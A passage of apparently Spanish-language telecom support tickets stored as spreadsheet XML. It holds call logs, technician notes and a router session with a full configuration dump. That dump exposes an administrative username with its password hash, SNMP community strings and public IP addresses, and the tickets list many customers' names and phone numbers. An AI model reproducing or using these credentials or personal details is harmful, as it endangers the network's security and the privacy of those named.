ESTIMADO CLIENTE, POR ESTE MEDIO LE COMPARTO  LAS PRUEBAS DEL ENLACE REPORTADO CON NUMERO DE PRODUCTO 3702492, ENLACE PRINCIPAL  CASA MATRIZ PROGRAMA MUNDIAL DE ALIMENTO. ADJUNTO PRUEBAS REALIZADAS.
DESCRIPCIÓN WAN DEL ENLACE
EQUIPOS CONECTADOS POR PARTE DE LA RED LAN
TRÁFICO / CONSUMO POR PARTE DE LA RED LAN
ESTADO DE LAS INTERFACES
SALIDA HACIA INTERNET, SIN PERDIDA DE PAQUETES CON TIEMPOS DE RESPUESTA CORRECTOS
SALUDOS.
.</t>
  </si>
  <si>
    <t>F4599496</t>
  </si>
  <si>
    <t>EN PRUEBAS CON TEC. ERWIN DEL CID Y CLIENTE CARLOS GARRIDO SERVICIO LEVANTÓ POR UNOS MOMENTOS PERO LUEGO CAYÓ, SE OBSERVA QUE LA CONEXIÓN A LA PBX ESTÁ CAIDA. SE REINICIA DOS VECES LA PBX PERO NO LEVANTA. TEC. ERWIN DEL CID CERTIFICA EL E1 CON VEEX DEMOSTRANDO A CLIENTE ENTRADA Y SALIDA DE LLAMADAS. CLIENTE ENTERADO ESCALARÁ CON EL PROVEEDOR DE LA PBX PARA EL SEGUIMIENTO. PRUEBAS REALIZADAS EN PRESENCIA DE CARLOS GARRIDO QUIEN AUTORIZA EL CIERRE.
RESULTADO: LLAMADA HECHA
NOMBRE: 47706359
NÚMERO: 47706359
INICIO: HOY, 10:38 A. M.
FIN: HOY, 11:11 A. M.
DURACIÓN: 33:25
ID DE LLAMADA: 2001841445</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE CARLOS GARRIDO 53612105, ESTÁ APOYANDO A UBICAR EQUIPOS</t>
  </si>
  <si>
    <t>CLIENTE UBICA ASMI54L ALARMADO, PROCEDE A REINICIARLO PERO INCONVENIENTE PERSISTE, SE ABRIRÁ WO.
ESTADO ASMI54L
PWR    VERDE
ALM    ROJO
SYNC1 ROJO</t>
  </si>
  <si>
    <t>F4599509</t>
  </si>
  <si>
    <t>TECNICOS EN SITIO HACIENDO LAS CORRECCIONES PARA RESTABLECER SERVICIO
TEC. DAVID NAVARRO</t>
  </si>
  <si>
    <t>TECNICO ESTAN LLEGANDO AL SITIO INICIARAN TRABAJOS SE PEDIRA ACTUALIZACION MAS ADELANTE</t>
  </si>
  <si>
    <t>SE CORRIGE TABLA
	WO OPEN                                			8:40:00
1/4	INGENIERO DE IM 	7002-8958	2 HORAS	10:40:00
2/4	MARCO SALAZAR 	7002-0778	3 HORAS	11:40:00
3/4	GILBERTO FERNANDEZ		5 HORAS	13:40:00
4/4	LUIS IVAN ORTIZ	7002-5268	6 HORAS	14:40:00</t>
  </si>
  <si>
    <t>SESCCRFMN1T1IAM1#PING VRF CR_PUBLICO 10.201.10.54 REPEAT 1500
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1500, 100-BYTE ICMP ECHOS TO 10.201.10.54, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (1500/1500), ROUND-TRIP MIN/AVG/MAX = 1/2/16 MS
SESCCRFMN1T1IAM1#PING VRF CR_PUBLICO 10.201.10.54 REPEAT 1500
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1500, 100-BYTE ICMP ECHOS TO 10.201.10.54, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (1500/1500), ROUND-TRIP MIN/AVG/MAX = 1/2/8 MS
SESCCRFMN1T1IAM1#TELNET VRF
SESCCRFMN1T1IAM1#TELNET ?
  WORD  IP ADDRESS OR HOSTNAME OF A REMOTE SYSTEM
  &lt;CR&gt;
SESCCRFMN1T1IAM1#TELNET 10.201.10.54 /VR
SESCCRFMN1T1IAM1#TELNET 10.201.10.54 /VRF CR_PUBLICO
TRYING 10.201.10.54 ... OPEN
CCC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 USERNAME:  TIMEOUT EXPIRED!
USERNAME: CLAROCR
PASSWORD:
RT_PBS_ESCAZU#SHO IP INT NBRIE
                          ^
% INVALID INPUT DETECTED AT '^' MARKER.
RT_PBS_ESCAZU#SHO IP INT BRIE
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.201.10.54    YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   186.26.125.105  YES NVRAM  UP                    UP
GIGABITETHERNET0/1/0   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/1   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/2   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/3   UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5              10.99.64.155    YES NVRAM  UP                    UP
VLAN1                  UNASSIGNED      YES UNSET  UP                    DOWN
RT_PBS_ESCAZU#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.201.10.53            2   7010.5C55.073F  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.201.10.54            -   C4B2.39B4.4F80  ARPA   GIGABITETHERNET0/0/0
INTERNET  186.26.123.57           -   C4B2.39B4.4F81  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.26.123.58           5   84B8.02D3.1499  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.26.123.59           5   84B8.02D3.1499  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.26.123.61           0   INCOMPLETE      ARPA
INTERNET  186.26.123.62           0   INCOMPLETE      ARPA
INTERNET  186.26.125.105          -   C4B2.39B4.4F81  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.26.125.106          5   84B8.02D3.1494  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.26.125.107          5   84B8.02D3.1494  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.26.125.108          5   84B8.02D3.1494  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.26.125.109          5   84B8.02D3.1494  ARPA   GIGABITETHERNET0/0/1
INTERNET  186.26.125.110          5   84B8.02D3.1494  ARPA   GIGABITETHERNET0/0/1
RT_PBS_ESCAZU#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4761000       741   4696000       697         0
* GIGABITETHERNET0/0/1          0         0         0         0   4670000       695   4782000       736         0
  GIGABITETHERNET0/1/0          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/2          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/3          0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
  VLAN1                         0         0         0         0         0         0         0         0         0
RT_PBS_ESCAZU#CONF T
ENTER CONFIGURATION COMMANDS, ONE PER LINE.  END WITH CNTL/Z.
RT_PBS_ESCAZU(CONFIG)#NO IP DOMAIN
RT_PBS_ESCAZU(CONFIG)#NO IP DOMAIN
RT_PBS_ESCAZU(CONFIG)#NO IP DOMA
RT_PBS_ESCAZU(CONFIG)#NO IP DOMAI
RT_PBS_ESCAZU(CONFIG)#NO IP DOMAIN
RT_PBS_ESCAZU(CONFIG)#NO IP DOMAIN LO
RT_PBS_ESCAZU(CONFIG)#NO IP DOMAIN LOOKUP
RT_PBS_ESCAZU(CONFIG)#EXIT
RT_PBS_ESCAZU#WE
% BAD IP ADDRESS OR HOST NAME% UNKNOWN COMMAND OR COMPUTER NAME, OR UNABLE TO FIND COMPUTER ADDRESS
RT_PBS_ESCAZU#WR
BUILDING CONFIGURATION...
[OK]
RT_PBS_ESCAZU#EXIT
[CONNECTION TO 10.201.10.54 CLOSED BY FOREIGN HOST]
SESCCRFMN1T1IAM1#TELNET 10.201.10.54 /VRF CR_PUBLICO
TRYING 10.201.10.54 ... OPEN
CCC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CLAROCR
PASSWORD:
RT_PBS_ESCAZU#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5393 BYTES
!
! LAST CONFIGURATION CHANGE AT 19:33:08 UTC MON JUN 13 2022 BY CLAROCR
!
VERSION 16.9
SERVICE TIMESTAMPS DEBUG DATETIME MSEC
SERVICE TIMESTAMPS LOG DATETIME MSEC
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME RT_PBS_ESCAZU
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
LOGGING BUFFERED 51200 WARNINGS
!
NO AAA NEW-MODEL
!
NO IP DOMAIN LOOKUP
!
!
!
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-2509605546
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-2509605546
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-2509605546
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-2509605546
 CERTIFICATE SELF-SIGNED 01
  30820330 30820218 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 32353039 36303535 3436301E 170D3230 30343238 31393032
  35385A17 0D333030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D32 35303936
  30353534 36308201 22300D06 092A8648 86F70D01 01010500 0382010F 00308201
  0A028201 01009FFB 2E42D81E 72BEB073 32BAF02B 9E7DF136 4C78A34D 07457504
  03C9B1C4 134314F7 15571748 62CBF7CA 52E67C0D 540403EA F5248E07 5782A303
  86BE69E9 579898FF 21A7616B FF0F8D0F 2DDF427C F45E5578 785826C8 C449ED8E
  88509F14 0A39EC3F 7ADDFBEA 17E615F5 6CBA591C 113F45E6 D6469D67 8703153A
  39117747 E9606EC6 276D0FE4 09F01317 06921E57 12825803 C1252A7D 839F1741
  A76E3846 0DE76E31 4AC9E7C6 A7194758 D180CFD5 4F20E28B 6D098811 A01603EB
  6EB6C5AC 7BDA2624 DB2CCBC8 E123B14B 5680DC9A BE54C66D 983EA1ED 4BBA5AA7
  985FE6E1 FA2D5C3D 36F773A7 88706C24 2C5CC368 BE895C46 FF5D756D FE006E6E
  427394B1 E9A70203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF
  301F0603 551D2304 18301680 1490A74C 8E34E241 BF870604 73495302 7A83B320
  E8301D06 03551D0E 04160414 90A74C8E 34E241BF 87060473 4953027A 83B320E8
  300D0609 2A864886 F70D0101 05050003 82010100 9B6FAB51 C1E84392 738DBDB7
  072D6FD0 3C4B9C24 39A43147 75BC513D C602EACE 7D105319 B9626085 9B6DC2BA
  C592273D F19E405C F1D2E0D2 B89A0EF9 8F5F7D5C 4868BC6F 5EF5ED33 00505DA2
  9E4CE1CC E894F0B5 5D1E4C8E D403529F 65795ED7 9218AAA9 7581152B BB986B80
  235F5ABB D59797ED 150C4D4C 8440864F C7A6488A F32DE98B 0E38C750 8C52D9AA
  5EA0A5BF 36C19183 2C16D8BF DD56B6B0 087EED8B 1A841FE2 D6A85C32 DBA4BDEA
  44527F29 FA29E9AE B57FC9AA 7D7ECFF9 DD3DEAB7 840AC400 A843E1BD 2AD84BF8
  2328D522 14FD1A65 D52A9062 CAA41044 9566F7A6 B4B1A723 CE081267 2AE98BD2
  E4E2692A 7C3A1D72 65FDD831 8C4F1D2C 7966AF61
        QUIT
!
LICENSE UDI PID C1111-4P SN FGL2350LH15
NO LICENSE SMART ENABLE
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME CLAROCR PRIVILEGE 15 SECRET 5 $1$XLX2$CV9K8U8MQX7DXFTMNF0VU/
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
POLICY-MAP POLICE40MB
 CLASS CLASS-DEFAULT
  POLICE RATE 41943000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
POLICY-MAP POLICE80MB
 CLASS CLASS-DEFAULT
  POLICE RATE 83886000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
POLICY-MAP 40
 CLASS CLASS-DEFAULT
  POLICE RATE 40971500
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
POLICY-MAP POLICE20MB
 CLASS CLASS-DEFAULT
  POLICE RATE 20971500
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.64.155 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION **ENLACE WAN PRINCIPAL**
 IP ADDRESS 10.201.10.54 255.255.255.252
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION **ENLACE INTERNET**
 BANDWIDTH 81920
 IP ADDRESS 186.26.123.57 255.255.255.248 SECONDARY
 IP ADDRESS 186.26.125.105 255.255.255.248
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DUPLEX FULL
!
INTERFACE GIGABITETHERNET0/1/1
!
INTERFACE GIGABITETHERNET0/1/2
!
INTERFACE GIGABITETHERNET0/1/3
!
INTERFACE VLAN1
 NO IP ADDRESS
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
NO IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.201.10.53
!
!
ACCESS-LIST 66 PERMIT 10.0.0.0 0.255.255.255
ACCESS-LIST 66 DENY   ANY
!
!
SNMP-SERVER COMMUNITY CISC0 RO
SNMP-SERVER COMMUNITY CNOCR RO
SNMP-SERVER LOCATION SAN RAFAEL DE ESCAZU , DEL PRIMER PEAJE DE LA RUTA 27 600MTS OESTE SOBRE LA PARALELA
!
!
CONTROL-PLANE
!
BANNER LOGIN ^CCCC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ACCESS-CLASS 66 IN
 LOGIN LOCAL
 TRANSPORT INPUT NONE
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS 66 IN
 PRIVILEGE LEVEL 15
 LOGIN LOCAL
 TRANSPORT INPUT TELNET SSH
!
!
!
!
!
!
END
RT_PBS_ESCAZU#</t>
  </si>
  <si>
    <t xml:space="preserve">	WO OPEN                                			8:40:00
1/4	INGENIERO DE IM 	7002-8958	2 HORAS	10:40:00
2/4	MARCO SALAZAR 	7002-0778	3 HORAS	9:40:00
3/4	GILBERTO FERNANDEZ		5 HORAS	11:40:00
4/4	LUIS IVAN ORTIZ	7002-5268	6 HORAS	12:40:00</t>
  </si>
  <si>
    <t>SIN RESPUESTA
2001843378
COLA:
NOMBRE: A: 50670028958
NÚMERO: 50670028958
DURACIÓN: 0:00:43
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 50670028958
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JANTONIO.FERNANDEZ
FECHA Y HORA LOCALES: 13/06/2022 10:43:37</t>
  </si>
  <si>
    <t>F4599515</t>
  </si>
  <si>
    <t>SE VALIDA EL SERVICIO CON EL CLIENTE DANIEL ZUÑIGA QUIEN INDICA QUE OBSERVA QUE EL EQUIPO SE MIRA USADO.
POR LO QUE SOLICITA DEJAR EL SERVICIO  EN MONITOREO HASTA EL DIA DE MAÑANA A LAS 12:00HRS.
2001916012
COLA:
NOMBRE: A: 0050688310406
NÚMERO: 0050688310406
DURACIÓN: 0:00:32
ESTADO: CONECTADA
DETALLES: 0050688310406
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 13/06/2022 14:10:41</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL SUÑIGA 0050688310406 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001102480 - 3001103134</t>
  </si>
  <si>
    <t>F4599517</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ARMANDO GONZALEZ   86279354 NO CONTESTO IVR ENVIA A BUZON,,, ID: 2001823781...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARLON MONTOYA 89428779 MENCIONA QUE NO CUENTA CON SALIDA DE INTERNET, SE DEJA EN CONFERENCIA CON GESTOR
-ID 20017994724 - 2001795295</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ARMANDO GONZALEZ   86279354 NO CONTESTA IVR ENVIA A BUZON, ID: 2001852692. TOMAR NOTA QUE A NIVEL DE CLARO ESTE ENLACE CONTINUA OPERATIVO Y ESTABLE, UNICAMENTE CLIENTE ESTA SOLVENTANDO SU PROBLEMA INTERNO Y SOLICITO REALIZAR PRUEBAS DESPUES DE SOLVENTAR SU PROBLEMA LAN.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. ARMANDO GONZALEZ   86279354 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001878355
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ARMANDO GONZALEZ   86279354 INFORMA QUE SE MOVILIZA AL SITIO REMTO, ESTIMA LLEGAR EN UNA HORA PARA VALIDAR ENLACE... SE LLAMARA DESPUES DE UNA HORA.</t>
  </si>
  <si>
    <t>F4599525</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAURICIO PEÑA 77493031 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001797936</t>
  </si>
  <si>
    <t>SE REALIZARA PRUEBAS CON PC DIRECTO HACIA EL ROUTER SIN EMBARGO CLIENTE SOLICITA LLAMADA EN 10 MINUTOS---
GI3/0/3</t>
  </si>
  <si>
    <t>F4599528</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE, PARA VALIDAR ESTADO DEL SERVICIO, CONTESTA PERO LUEGO CORTA LA LLAMADA, SE INTENTARA LUEGO.
2001797551
COLA:
NOMBRE: A: 0050588340148
NÚMERO: 0050588340148
DURACIÓN: 0:00:24
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050588340148
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/06/2022 08:38:17</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE NUMARA, INDICA QUE EL SERVICIO SE ENCUENTRA OPERATIVO, ASUME QUE EL REINICIO DEL CPE SE DEBE A ENERGIA ELECTRICA YA QUE NO INTERVINO PERSONAL EN EL REINICIO, POR LO QUE AUTORIZA CIERRE DEL TICKET.
2001799254
COLA:
NOMBRE: A: 0050588340148
NÚMERO: 0050588340148
DURACIÓN: 0:01:23
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050588340148
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 13/06/2022 08:44:40</t>
  </si>
  <si>
    <t>F4599529</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MISHELL CRUZ 44291675 CONFIRMA QUE EL SERVICIO A NIVEL DE CLARO ESTA ACTIVO, TIENE QUE DAR SEGUIMIENTO CON SU PROVEEDOR, SE PROCEDE AL CIERRE DEL TICKET
2001849068
COLA:
NOMBRE: A: 44291675
NÚMERO: 44291675
ESTADO: CONECTADA
DURACIÓN: 0:00:38
DETALLES: 44291675
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 13/06/2022 10:58:49</t>
  </si>
  <si>
    <t>F4599538</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELISA AGUIRRE 77002414 QUIEN COPNFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001831165</t>
  </si>
  <si>
    <t>F4599547</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VERONICA MENENDEZ 77449901 NO RESPONDE, ENVIA A BUZON
-ID 2001797360 - 2001797550</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VERONICA MENENDEZ 77449901 MENCIONA QUE SE EQUIVOCO AL REPORTAR EL SERVICIO
INDICA QUE PRESENTA PROBLEMA CON EL SERVICIO RESIDENCIAL
-ID 2001832146</t>
  </si>
  <si>
    <t>F4599558</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIME LOPEZ AL 74899894 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001862461
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME LOPEZ 74899894 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001836640</t>
  </si>
  <si>
    <t>F4599559</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIIO TAGUICO 47687682 MENCIONA QUE YA REINICIARON LOS EQUIPOS PERO EL SERVICIO NO RESTABLECE, CLIENTE MENCIONA QUE ESTA ES LA 2DA VEZ QUE TIENEN PROBLEMA EN MENOS DE UN MES
-ID 2001811363
NOMBRE DEL CLIENTE: COMNET, S.A.
UBICACIÓN:KILOMETRO 144.5 ALDEA LOS JOCOTES, RUTA ASFALTADA, SAN JERONIMO
CONTACTO EN SITIO: JULIIO TAGUICO - 47687682
HORARIO DE ATENCION:7:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4599560</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MELVIN LEIVA  56301264 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001838414</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  BRENDA CASEMIROS 78343137 SUENA DESCONECTADO
-ID 2001839707</t>
  </si>
  <si>
    <t>F4599564</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GENIE FAJARDO 99957103 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001841164</t>
  </si>
  <si>
    <t>F4599565</t>
  </si>
  <si>
    <t>CLIENTE GUSTAVO MENDEZ 32762246 VALIDA QUE TUVO PROBLEMAS DE ENERGIA.  SUS TELEFONOS INTERNOS NO SUENAN PERO SE LE DEMUESTRA QUE LLAMADAS SI LLEGAN A LA PBX. SE LE INDICA QUE ESTE PROBLEMA INTERNO YA LO TIENE QUE REPORTAR CON EL PERSONAL DE TELEFONIA DEL BANCO. SE DA POR ENTERADO Y SE PROCEDE AL CIERRE DEL CASO.
2001808485
COLA:
NOMBRE: A: 32762246
NÚMERO: 011 50232762246
DURACIÓN: 0:00:39
ESTADO: CONECTADA
DETALLES: +50232762246
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 13/06/2022 09:11:04</t>
  </si>
  <si>
    <t>F4599567</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AUDENCIO MORAN 42201984 PARA BRINDAR RETROALIMENTACION
-ID 2001843588</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TEC JAVIER CHETE QUIEN INDICA QUE YA TERMINARON DE REPARAR LA FO, SERVICIO OPERATIVO
##LLAMADA DESDE VIVO
##SE DETIENE TIEMPO DE ESCALACION
##SE DA CODIGO DE CIERRE</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AUDENCIO MORAN 42201984 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001856257
